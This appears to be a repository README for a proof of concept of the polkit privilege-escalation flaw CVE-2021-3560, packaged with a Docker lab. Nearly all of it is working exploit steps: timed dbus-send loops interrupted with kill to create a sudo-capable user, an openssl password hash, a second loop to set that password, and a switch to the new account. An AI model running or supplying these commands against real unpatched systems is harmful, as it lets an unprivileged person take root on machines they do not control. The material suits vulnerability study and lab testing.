# CVE-2021-3560-Polkit-Privilege-Escalation
by Mark, Qingchen Yu
To build the container with
```
docker build -t <image tag of your choice> .
```
To run the container
```
docker run -it <image tag name>
```
1. start with ``start.sh``
2. Measura Execution Time:
Note the 'real' time and calculate half of it.
```
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
```
3. Create a User with Sudo Privileges:
Replace X.XXX with half of the 'real' time above because we want the process to be interrupted in the middle
the command will run as a loop of 10000 times
You may need to run this step several times
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
```
4. Check User creation
``
id samurai
``
It should show samurai user exists and show his permissions. Run the step 2 again if not.
5. Generate Password Hash:
in this case, password would be 'iamsamurai'
Note the hash generated.
```
openssl passwd -5 iamsamurai
```
6. Set Password for New User:
Replace X.XXX with the sleep duration and Password Hash with the hash from step 4. Replace UUUU with the user ID of 'samurai'
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
```
7. Switch to new user with the password you created in step 4.
``su - samurai``
Now you should be able to use 'sudo with this user'.
登录后查看神龙缓存的 POC 文件快照
登录查看